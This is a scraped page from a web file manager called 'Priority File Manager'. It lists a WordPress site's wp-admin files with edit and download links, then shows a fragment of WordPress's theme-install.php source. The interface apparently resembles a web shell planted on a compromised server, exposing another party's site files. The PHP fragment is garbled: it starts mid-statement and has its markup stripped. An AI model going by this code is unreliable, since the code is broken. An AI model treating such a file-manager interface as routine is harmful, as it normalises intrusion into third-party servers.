Priority File Manager

📁 public_html
Base Directory:
/home/toolrmtm/crazyespresso.com/wp-admin
NameTypeSizeActions
📁 .. Folder -
📄 about.php File 15611
Edit Download
📄 admin-ajax.php File 5146
Edit Download
📄 admin-footer.php File 2834
Edit Download
📄 admin-functions.php File 479
Edit Download
📄 admin-header.php File 9336
Edit Download
📄 admin-post.php File 2021
Edit Download
📄 admin.php File 12646
Edit Download
📄 async-upload.php File 5604
Edit Download
📄 authorize-application.php File 10335
Edit Download
📄 comment.php File 11622
Edit Download
📄 contribute.php File 5998
Edit Download
📄 credits.php File 4483
Edit Download
📁 css Folder -
📄 custom-background.php File 489
Edit Download
📄 custom-header.php File 499
Edit Download
📄 customize.php File 11271
Edit Download
📄 edit-comments.php File 14729
Edit Download
📄 edit-form-advanced.php File 29527
Edit Download
📄 edit-form-blocks.php File 14947
Edit Download
📄 edit-form-comment.php File 8543
Edit Download
📄 edit-link-form.php File 6354
Edit Download
📄 edit-tag-form.php File 10688
Edit Download
📄 edit-tags.php File 22533
Edit Download
📄 edit.php File 19952
Edit Download
📄 erase-personal-data.php File 7505
Edit Download
📄 error_log File 81092
Edit Download
📄 export-personal-data.php File 7941
Edit Download
📄 export.php File 11288
Edit Download
📄 freedoms.php File 4916
Edit Download
📁 images Folder -
📄 import.php File 7766
Edit Download
📁 includes Folder -
📄 index.php File 7864
Edit Download
📄 install-helper.php File 6961
Edit Download
📄 install.php File 18192
Edit Download
📁 js Folder -
📄 link-add.php File 934
Edit Download
📄 link-manager.php File 4361
Edit Download
📄 link-parse-opml.php File 2784
Edit Download
📄 link.php File 2957
Edit Download
📄 load-scripts.php File 2070
Edit Download
📄 load-styles.php File 2995
Edit Download
📁 maint Folder -
📄 media-new.php File 3276
Edit Download
📄 media-upload.php File 3668
Edit Download
📄 media.php File 819
Edit Download
📄 menu-header.php File 10059
Edit Download
📄 menu.php File 17880
Edit Download
📄 moderation.php File 307
Edit Download
📄 ms-admin.php File 196
Edit Download
📄 ms-delete-site.php File 4613
Edit Download
📄 ms-edit.php File 216
Edit Download
📄 ms-options.php File 229
Edit Download
📄 ms-sites.php File 215
Edit Download
📄 ms-themes.php File 217
Edit Download
📄 ms-upgrade-network.php File 219
Edit Download
📄 ms-users.php File 215
Edit Download
📄 my-sites.php File 4858
Edit Download
📄 nav-menus.php File 49345
Edit Download
📁 network Folder -
📄 network.php File 5522
Edit Download
📄 options-discussion.php File 16297
Edit Download
📄 options-general.php File 22167
Edit Download
📄 options-head.php File 621
Edit Download
📄 options-media.php File 6530
Edit Download
📄 options-permalink.php File 21726
Edit Download
📄 options-privacy.php File 10190
Edit Download
📄 options-reading.php File 10174
Edit Download
📄 options-writing.php File 9323
Edit Download
📄 options.php File 13930
Edit Download
📄 plugin-editor.php File 14082
Edit Download
📄 plugin-install.php File 7124
Edit Download
📄 plugins.php File 30724
Edit Download
📄 post-new.php File 2768
Edit Download
📄 post.php File 10274
Edit Download
📄 press-this.php File 2396
Edit Download
📄 privacy-policy-guide.php File 3756
Edit Download
📄 privacy.php File 2854
Edit Download
📄 profile.php File 283
Edit Download
📄 revision.php File 5836
Edit Download
📄 setup-config.php File 17904
Edit Download
📄 site-editor.php File 12271
Edit Download
📄 site-health-info.php File 4088
Edit Download
📄 site-health.php File 10448
Edit Download
📄 term.php File 2249
Edit Download
📄 theme-editor.php File 17279
Edit Download
📄 theme-install.php File 23945
Edit Download
📄 themes.php File 49075
Edit Download
📄 tools.php File 3514
Edit Download
📄 update-core.php File 46539
Edit Download
📄 update.php File 13092
Edit Download
📄 upgrade-functions.php File 341
Edit Download
📄 upgrade.php File 6422
Edit Download
📄 upload.php File 15259
Edit Download
📁 user Folder -
📄 user-edit.php File 41328
Edit Download
📄 user-new.php File 24623
Edit Download
📄 users.php File 23846
Edit Download
📄 widgets-form-blocks.php File 5242
Edit Download
📄 widgets-form.php File 19719
Edit Download
📄 widgets.php File 1112
Edit Download
$theme_data ) { // Ignore child themes. if ( str_contains( $theme_slug, '/' ) ) { unset( $installed_themes[ $theme_slug ] ); } } wp_localize_script( 'theme', '_wpThemeSettings', array( 'themes' => false, 'settings' => array( 'isInstall' => true, 'canInstall' => current_user_can( 'install_themes' ), 'installURI' => current_user_can( 'install_themes' ) ? self_admin_url( 'theme-install.php' ) : null, 'adminUrl' => parse_url( self_admin_url(), PHP_URL_PATH ), ), 'l10n' => array( 'addNew' => __( 'Add Theme' ), 'search' => __( 'Search Themes' ), 'upload' => __( 'Upload Theme' ), 'back' => __( 'Back' ), 'error' => sprintf( /* translators: %s: Support forums URL. */ __( 'An unexpected error occurred. Something may be wrong with WordPress.org or this server’s configuration. If you continue to have problems, please try the support forums.' ), __( 'https://wordpress.org/support/forums/' ) ), 'tryAgain' => __( 'Try Again' ), /* translators: %d: Number of themes. */ 'themesFound' => __( 'Number of Themes found: %d' ), 'noThemesFound' => __( 'No themes found. Try a different search.' ), 'collapseSidebar' => __( 'Collapse Sidebar' ), 'expandSidebar' => __( 'Expand Sidebar' ), /* translators: Hidden accessibility text. */ 'selectFeatureFilter' => __( 'Select one or more Theme features to filter by' ), ), 'installedThemes' => array_keys( $installed_themes ), 'activeTheme' => get_stylesheet(), ) ); wp_enqueue_script( 'theme' ); wp_enqueue_script( 'updates' ); if ( $tab ) { /** * Fires before each of the tabs are rendered on the Install Themes page. * * The dynamic portion of the hook name, `$tab`, refers to the current * theme installation tab. * * Possible hook names include: * * - `install_themes_pre_block-themes` * - `install_themes_pre_dashboard` * - `install_themes_pre_featured` * - `install_themes_pre_new` * - `install_themes_pre_search` * - `install_themes_pre_updated` * - `install_themes_pre_upload` * * @since 2.8.0 * @since 6.1.0 Added the `install_themes_pre_block-themes` hook name. */ do_action( "install_themes_pre_{$tab}" ); } $help_overview = '

' . sprintf( /* translators: %s: Theme Directory URL. */ __( 'You can find additional themes for your site by using the Theme Browser/Installer on this screen, which will display themes from the WordPress Theme Directory. These themes are designed and developed by third parties, are available free of charge, and are compatible with the license WordPress uses.' ), __( 'https://wordpress.org/themes/' ) ) . '

' . '

' . __( 'You can Search for themes by keyword, author, or tag, or can get more specific and search by criteria listed in the feature filter.' ) . ' ' . __( 'The search results will be updated as you type.' ) . '

' . '

' . __( 'Alternately, you can browse the themes that are Popular or Latest. When you find a theme you like, you can preview it or install it.' ) . '

' . '

' . sprintf( /* translators: %s: /wp-content/themes */ __( 'You can Upload a theme manually if you have already downloaded its ZIP archive onto your computer (make sure it is from a trusted and original source). You can also do it the old-fashioned way and copy a downloaded theme’s folder via FTP into your %s directory.' ), '/wp-content/themes' ) . '

'; get_current_screen()->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => $help_overview, ) ); $help_installing = '

' . __( 'Once you have generated a list of themes, you can preview and install any of them. Click on the thumbnail of the theme you are interested in previewing. It will open up in a full-screen Preview page to give you a better idea of how that theme will look.' ) . '

' . '

' . __( 'To install the theme so you can preview it with your site’s content and customize its theme options, click the "Install" button at the top of the left-hand pane. The theme files will be downloaded to your website automatically. When this is complete, the theme is now available for activation, which you can do by clicking the "Activate" link, or by navigating to your Manage Themes screen and clicking the "Live Preview" link under any installed theme’s thumbnail image.' ) . '

'; get_current_screen()->add_help_tab( array( 'id' => 'installing', 'title' => __( 'Previewing and Installing' ), 'content' => $help_installing, ) ); // Help tab: Block themes. $help_block_themes = '

' . __( 'A block theme is a theme that uses blocks for all parts of a site including navigation menus, header, content, and site footer. These themes are built for the features that allow you to edit and customize all parts of your site.' ) . '

' . '

' . __( 'With a block theme, you can place and edit blocks without affecting your content by customizing or creating new templates.' ) . '

'; get_current_screen()->add_help_tab( array( 'id' => 'block_themes', 'title' => __( 'Block themes' ), 'content' => $help_block_themes, ) ); get_current_screen()->set_help_sidebar( '

' . __( 'For more information:' ) . '

' . '

' . __( 'Documentation on Adding New Themes' ) . '

' . '

' . __( 'Documentation on Block Themes' ) . '

' . '

' . __( 'Support forums' ) . '

' ); require_once ABSPATH . 'wp-admin/admin-header.php'; ?>

__( 'Upload Theme' ) ) ); if ( ! empty( $tabs['upload'] ) && current_user_can( 'upload_themes' ) ) { echo ' '; } ?>
array( 'error', 'hide-if-js' ), ) ); ?>

$features ) { echo '
'; echo '' . esc_html( $feature_group ) . ''; echo '
'; foreach ( $features as $feature => $feature_name ) { $feature = esc_attr( $feature ); echo ' '; echo ''; } echo '
'; echo '
'; } ?>